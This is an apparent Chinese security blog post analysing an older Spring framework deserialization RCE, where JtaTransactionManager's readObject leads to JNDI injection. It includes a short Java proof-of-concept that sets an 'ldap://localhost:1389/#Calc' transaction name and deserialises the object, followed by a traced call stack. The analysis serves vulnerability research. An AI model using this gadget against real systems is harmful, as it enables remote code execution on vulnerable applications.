<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head>
    <meta charset="utf-8">
<title>Spring framework 反序列化 RCE 漏洞分析 - P2hm1n&#39;s Blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">








    <meta name="description" content="Spring framework &amp;#x4E2D;&amp;#x53CD;&amp;#x5E8F;&amp;#x5217;&amp;#x5316; +  JNDI Injection &amp;#x5229;&amp;#x7528;&amp;#x5206;&amp;#x6790;">
<meta property="og:type" content="article">
<meta property="og:title" content="Spring framework 反序列化 RCE 漏洞分析">
<meta property="og:url" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="P2hm1n&#39;s Blog">
<meta property="og:description" content="Spring framework &amp;#x4E2D;&amp;#x53CD;&amp;#x5E8F;&amp;#x5217;&amp;#x5316; +  JNDI Injection &amp;#x5229;&amp;#x7528;&amp;#x5206;&amp;#x6790;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210305214555720.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005315163.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005354287.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005545021.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010142951.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010235013.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010400495.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010631183.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306011227534.png">
<meta property="og:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306011321591.png">
<meta property="article:published_time" content="2021-03-05T13:27:08.000Z">
<meta property="article:modified_time" content="2021-03-11T06:07:11.259Z">
<meta property="article:author" content="P2hm1n">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210305214555720.png">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-light.min.css">


<link rel="stylesheet" href="/css/style.css">


<script defer src="//use.fontawesome.com/releases/v5.0.8/js/all.js"></script>


    
    
    
    
    
    
    
    
    
    

    


<meta name="generator" content="Hexo 4.2.1"></head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt="" height="50">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item "
               href="/archives">Archives</a>
            
            <a class="navbar-item "
               href="/categories">Categories</a>
            
            <a class="navbar-item "
               href="/tags">Tags</a>
            
            <a class="navbar-item "
               href="/about">About</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            <a class="navbar-item search" title="Suche" href="javascript:;">
                <i class="fas fa-search"></i>
            </a>
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Inhaltsverzeichnis">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#漏洞概述">1&nbsp;&nbsp;<b>漏洞概述</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#漏洞利用">2&nbsp;&nbsp;<b>漏洞利用</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#漏洞分析">3&nbsp;&nbsp;<b>漏洞分析</b></a>
                    
                </div>
            </div>
            
            
            <a class="navbar-item" title="GitHub" href="https://github.com/P2hm1n" target="_blank" rel="noopener">
                
                <i class="fab fa-github"></i>
                
            </a>
               
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            Spring framework 反序列化 RCE 漏洞分析
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            
                <time datetime="2021-03-05T13:27:08.000Z" itemprop="datePublished">3月 5 2021</time>
            
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/Java-Sec/">Java Sec</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            5 分钟 lesen (Über 792 Wörter)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <html><head></head><body><p>Spring framework &#x4E2D;&#x53CD;&#x5E8F;&#x5217;&#x5316; +  JNDI Injection &#x5229;&#x7528;&#x5206;&#x6790;</p>
<a id="more"></a>

<p>&#x6587;&#x7AE0;&#x9996;&#x53D1;&#x4E8E; SECIN&#x793E;&#x533A;&#xFF1A;<a href="https://sec-in.com/article/922" target="_blank" rel="noopener">https://sec-in.com/article/922</a></p>
<h1 id="&#x6F0F;&#x6D1E;&#x6982;&#x8FF0;"><a href="#&#x6F0F;&#x6D1E;&#x6982;&#x8FF0;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x6982;&#x8FF0;"></a>&#x6F0F;&#x6D1E;&#x6982;&#x8FF0;</h1><p>&#x76F8;&#x5173;&#x5206;&#x6790;&#x6F0F;&#x6D1E;&#x662F;&#x4E00;&#x4E2A;&#x51E0;&#x5E74;&#x524D;&#x7684;&#x6F0F;&#x6D1E;&#xFF0C;&#x5E76;&#x975E;&#x662F;&#x6700;&#x8FD1;&#x521A;&#x51FA;&#x7684;&#x3002;&#x4E4B;&#x6240;&#x4EE5;&#x5206;&#x6790;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x662F;&#x56E0;&#x4E3A;&#x7B14;&#x8005;&#x5728;&#x68B3;&#x7406; fastjson &#x5386;&#x53F2;&#x8865;&#x4E01;&#x7ED5;&#x8FC7;&#x7684;&#x65F6;&#x5019;&#x770B;&#x5230;&#x4E86;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x7684;&#x76F8;&#x5173;&#x4ECB;&#x7ECD;&#xFF0C;&#x6BD4;&#x8D77; fastjson &#x7B14;&#x8005;&#x8BA4;&#x4E3A;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x66F4;&#x52A0;&#x7B80;&#x5355;&#x548C;&#x76F4;&#x63A5;&#x7684;&#x63ED;&#x793A;&#x4E86; Java &#x53CD;&#x5E8F;&#x5217;&#x5316;&#x548C; JNDI &#x6CE8;&#x5165;&#x7684;&#x8054;&#x7CFB;</p>
<p>&#x8BE5;&#x6F0F;&#x6D1E;&#x5B58;&#x5728;&#x4E8E;spring-tx.jar&#x5305;&#x7684;org.springframework.transaction.jta.JtaTransactionManager&#x7C7B;&#xFF0C;&#x5E76;&#x4E0D;&#x662F;spring&#x6700;&#x57FA;&#x672C;&#x7684;&#x5305;&#xFF0C;&#x9ED8;&#x8BA4;&#x4E0D;&#x4F7F;&#x7528;&#xFF0C;&#x53EA;&#x5F71;&#x54CD;&#x5305;&#x542B;&#x4E86;spring-tx.jar&#x5305;&#x7684; Spring &#x6846;&#x67B6;&#x5E94;&#x7528;</p>
<h1 id="&#x6F0F;&#x6D1E;&#x5229;&#x7528;"><a href="#&#x6F0F;&#x6D1E;&#x5229;&#x7528;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x5229;&#x7528;"></a>&#x6F0F;&#x6D1E;&#x5229;&#x7528;</h1><p>POC</p>
<p></p><figure class="highlight java hljs"><table><tbody><tr><td class="code"><pre><span class="line"><span class="hljs-keyword">import</span> org.springframework.transaction.jta.JtaTransactionManager;</span><br><span class="line"><span class="hljs-keyword">import</span> java.io.*;</span><br><span class="line"></span><br><span class="line"><span class="hljs-keyword">public</span> <span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Demo01</span> </span>{</span><br><span class="line">    <span class="hljs-function"><span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> IOException, ClassNotFoundException </span>{</span><br><span class="line">        JtaTransactionManager myPOC = <span class="hljs-keyword">new</span> JtaTransactionManager();</span><br><span class="line">        myPOC.setUserTransactionName(<span class="hljs-string">&quot;ldap://localhost:1389/#Calc&quot;</span>);</span><br><span class="line"></span><br><span class="line">        ByteArrayOutputStream bos = <span class="hljs-keyword">new</span> ByteArrayOutputStream();</span><br><span class="line">        ObjectOutputStream oos = <span class="hljs-keyword">new</span> ObjectOutputStream(bos);</span><br><span class="line">        oos.writeObject(myPOC);</span><br><span class="line">        oos.close();</span><br><span class="line"></span><br><span class="line">        System.out.println(bos);</span><br><span class="line">        ObjectInputStream ois = <span class="hljs-keyword">new</span> ObjectInputStream(<span class="hljs-keyword">new</span> ByteArrayInputStream(bos.toByteArray()));</span><br><span class="line">        ois.readObject();</span><br><span class="line">    }</span><br><span class="line">}</span><br></pre></td></tr></tbody></table></figure><p></p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210305214555720.png" alt></p>
<h1 id="&#x6F0F;&#x6D1E;&#x5206;&#x6790;"><a href="#&#x6F0F;&#x6D1E;&#x5206;&#x6790;" class="headerlink" title="&#x6F0F;&#x6D1E;&#x5206;&#x6790;"></a>&#x6F0F;&#x6D1E;&#x5206;&#x6790;</h1><p>&#x76F8;&#x6BD4;&#x4E8E; fastjson &#x5229;&#x7528;&#x94FE;&#xFF0C;&#x8FD9;&#x4E2A;&#x5229;&#x7528;&#x94FE;&#x5DF2;&#x7ECF;&#x6781;&#x5176;&#x7B80;&#x5355;&#xFF0C;&#x6F0F;&#x6D1E;&#x7684;&#x6838;&#x5FC3;&#x662F; JtaTransactionManager&#x7C7B;&#xFF0C;&#x8BE5;&#x7C7B;&#x5B9E;&#x73B0;&#x4E86;Java Transaction API&#xFF0C;&#x4E3B;&#x8981;&#x529F;&#x80FD;&#x662F;&#x5904;&#x7406;&#x5206;&#x5E03;&#x5F0F;&#x7684;&#x4E8B;&#x52A1;&#x7BA1;&#x7406;&#xFF0C;&#x6B64;&#x7C7B;&#x5B9E;&#x73B0;&#x4E86; Serializable&#xFF0C;</p>
<p><code>org.springframework.transaction.jta.JtaTransactionManager#readObject</code>&#xFF0C;&#x8FD9;&#x91CC;&#x8C03;&#x7528;&#x4E86; <code>initUserTransactionAndTransactionManager</code> &#x8FDB;&#x884C;&#x4E00;&#x4E9B;&#x5904;&#x7406;</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005315163.png" alt></p>
<p>&#x8DDF;&#x8FDB;&#x5176;&#x53D1;&#x73B0;&#x8FD9;&#x91CC; <code>this.lookupUserTransaction</code> &#x91CC;&#x9762;&#x7684; <code>this.userTransactionName</code> &#x662F;&#x6211;&#x4EEC;&#x53EF;&#x63A7;&#x7684;&#xFF0C;&#x5B83;&#x6765;&#x81EA;&#x6211;&#x4EEC; POC &#x4E2D; <code>setUserTransactionName</code> &#x7684;&#x503C;</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005354287.png" alt="image-20210306005354287"></p>
<p>&#x8DDF;&#x8FDB; <code>org.springframework.transaction.jta.JtaTransactionManager#lookupUserTransaction</code></p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306005545021.png" alt></p>
<p>&#x4E0A;&#x8FF0;&#x6838;&#x5FC3;&#x8BED;&#x53E5;&#x4E3A;</p>
<p></p><figure class="highlight java hljs"><table><tbody><tr><td class="code"><pre><span class="line"><span class="hljs-keyword">return</span> (UserTransaction)<span class="hljs-keyword">this</span>.getJndiTemplate().lookup(userTransactionName, UserTransaction.class);</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>&#x5148;&#x770B;&#x8FD9;&#x91CC;</p>
<p></p><figure class="highlight java hljs"><table><tbody><tr><td class="code"><pre><span class="line">(UserTransaction)<span class="hljs-keyword">this</span>.getJndiTemplate()</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>&#x8FFD;&#x6EAF; <code>JndiTemplate</code> &#x7684;&#x9644;&#x503C;&#xFF0C;&#x5176;&#x6765;&#x6E90;&#x4E8E;&#x6700;&#x5F00;&#x59CB;&#x7684; <code>JtaTransactionManager#readObject</code></p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010142951.png" alt></p>
<p>&#x56E0;&#x6B64;&#x4F1A;&#x8C03;&#x7528;&#x5176; lookup &#x7C7B;&#xFF0C;<code>org.springframework.jndi.JndiTemplate#lookup(java.lang.String, java.lang.Class&lt;T&gt;)</code>&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x51FA;&#x7B2C;&#x4E8C;&#x4E2A;&#x53C2;&#x6570;&#x5728;&#x6211;&#x4EEC; gadget chain &#x91CC;&#x5E76;&#x6CA1;&#x6709;&#x4EC0;&#x4E48;&#x5F71;&#x54CD;</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010235013.png" alt></p>
<p>&#x7EE7;&#x7EED;&#x8DDF;&#x8FDB; <code>org.springframework.jndi.JndiTemplate#lookup(java.lang.String)</code>&#xFF0C;&#x8FD9;&#x91CC;&#x6765;&#x5230;&#x4E86;&#x5173;&#x952E;&#x90E8;&#x5206;</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010400495.png" alt></p>
<p>&#x5148;&#x8DDF;&#x8FDB; <code>execute</code>&#xFF0C;&#x8FD9;&#x91CC;&#x4F1A;&#x521B;&#x5EFA;&#x4E00;&#x4E2A; ctx</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306010631183.png" alt></p>
<p>&#x8DDF;&#x8FDB;&#x5176; <code>getContext</code>&#xFF0C; &#x5176;&#x6838;&#x5FC3;&#x5728; <code>org.springframework.jndi.JndiTemplate#createInitialContext</code>&#xFF0C;&#x8FD9;&#x91CC;&#x521D;&#x59CB;&#x4E0A;&#x4E0B;&#x6587;&#x5B9E;&#x73B0;&#x4E86;Context&#x63A5;&#x53E3;&#xFF0C;&#x5E76;&#x63D0;&#x4F9B;&#x4E86;&#x540D;&#x79F0;&#x89E3;&#x6790;&#x7684;&#x8D77;&#x70B9;</p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306011227534.png" alt></p>
<p>&#x968F;&#x540E;&#x7531;&#x4E8E;&#x6211;&#x4EEC;&#x53CD;&#x5E8F;&#x5217;&#x5316;&#x53EF;&#x63A7;&#x4E86;&#x6700;&#x5F00;&#x59CB;&#x7684; <code>name</code> &#x53C2;&#x6570;&#xFF0C;&#x5BFC;&#x81F4;&#x6700;&#x540E;&#x8FD9;&#x91CC; <code>lookup</code> &#x53EF;&#x63A7;&#xFF0C;&#x9020;&#x6210;&#x4E86; JNDI &#x6CE8;&#x5165; </p>
<p><img src="/2021/03/05/Spring-framework-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20210306011321591.png" alt></p>
<p>&#x8C03;&#x7528;&#x6808;</p>
<p></p><figure class="highlight java hljs"><table><tbody><tr><td class="code"><pre><span class="line">lookup:<span class="hljs-number">91</span>, ldapURLContext (com.sun.jndi.url.ldap)</span><br><span class="line">lookup:<span class="hljs-number">417</span>, InitialContext (javax.naming)</span><br><span class="line">doInContext:<span class="hljs-number">154</span>, JndiTemplate$<span class="hljs-number">1</span> (org.springframework.jndi)</span><br><span class="line">execute:<span class="hljs-number">87</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookup:<span class="hljs-number">152</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookup:<span class="hljs-number">178</span>, JndiTemplate (org.springframework.jndi)</span><br><span class="line">lookupUserTransaction:<span class="hljs-number">546</span>, JtaTransactionManager (org.springframework.transaction.jta)</span><br><span class="line">initUserTransactionAndTransactionManager:<span class="hljs-number">426</span>, JtaTransactionManager (org.springframework.transaction.jta)</span><br><span class="line">readObject:<span class="hljs-number">1193</span>, JtaTransactionManager (org.springframework.transaction.jta)</span><br><span class="line">invoke0:-<span class="hljs-number">1</span>, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="hljs-number">62</span>, NativeMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="hljs-number">43</span>, DelegatingMethodAccessorImpl (sun.reflect)</span><br><span class="line">invoke:<span class="hljs-number">498</span>, Method (java.lang.reflect)</span><br><span class="line">invokeReadObject:<span class="hljs-number">1058</span>, ObjectStreamClass (java.io)</span><br><span class="line">readSerialData:<span class="hljs-number">1909</span>, ObjectInputStream (java.io)</span><br><span class="line">readOrdinaryObject:<span class="hljs-number">1808</span>, ObjectInputStream (java.io)</span><br><span class="line">readObject0:<span class="hljs-number">1353</span>, ObjectInputStream (java.io)</span><br><span class="line">readObject:<span class="hljs-number">373</span>, ObjectInputStream (java.io)</span><br><span class="line">main:<span class="hljs-number">18</span>, Demo01 (com.p2hm1n.springdemo)</span><br></pre></td></tr></tbody></table></figure><p></p>
</body></html>
    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">#反序列化</a></span>
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/Java/">#Java</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2021/03/06/%E9%80%9A%E8%BE%BE-OA-11-7-%E7%BB%84%E5%90%88%E6%8B%B3-RCE-%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90/">通达 OA 11.7 组合拳 RCE 利用分析</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2021/03/03/fastjson-%E2%89%A4-1-2-24-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-RCE-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">fastjson ≤ 1.2.24 反序列化 RCE 漏洞分析</a>
            
        </span>
    </div>
    
</article>




    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2021 P2hm1n&nbsp;
                 
            </div>
            <div class="column is-hidden-mobile"></div>

            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" href="https://github.com/P2hm1n" target="_blank" rel="noopener">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/" target="_blank" rel="noopener">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("zh-CN");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    
    

    



<script src="/js/script.js"></script>


    
    <div class="searchbox ins-search">
    <div class="searchbox-mask"></div>
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="Suche etwas..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: 'Posts',
                PAGES: 'Seiten',
                CATEGORIES: 'Kategorien',
                TAGS: 'Tags',
                UNTITLED: '(Sin título)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>

<script src="/js/insight.js"></script>

    
</body>
</html>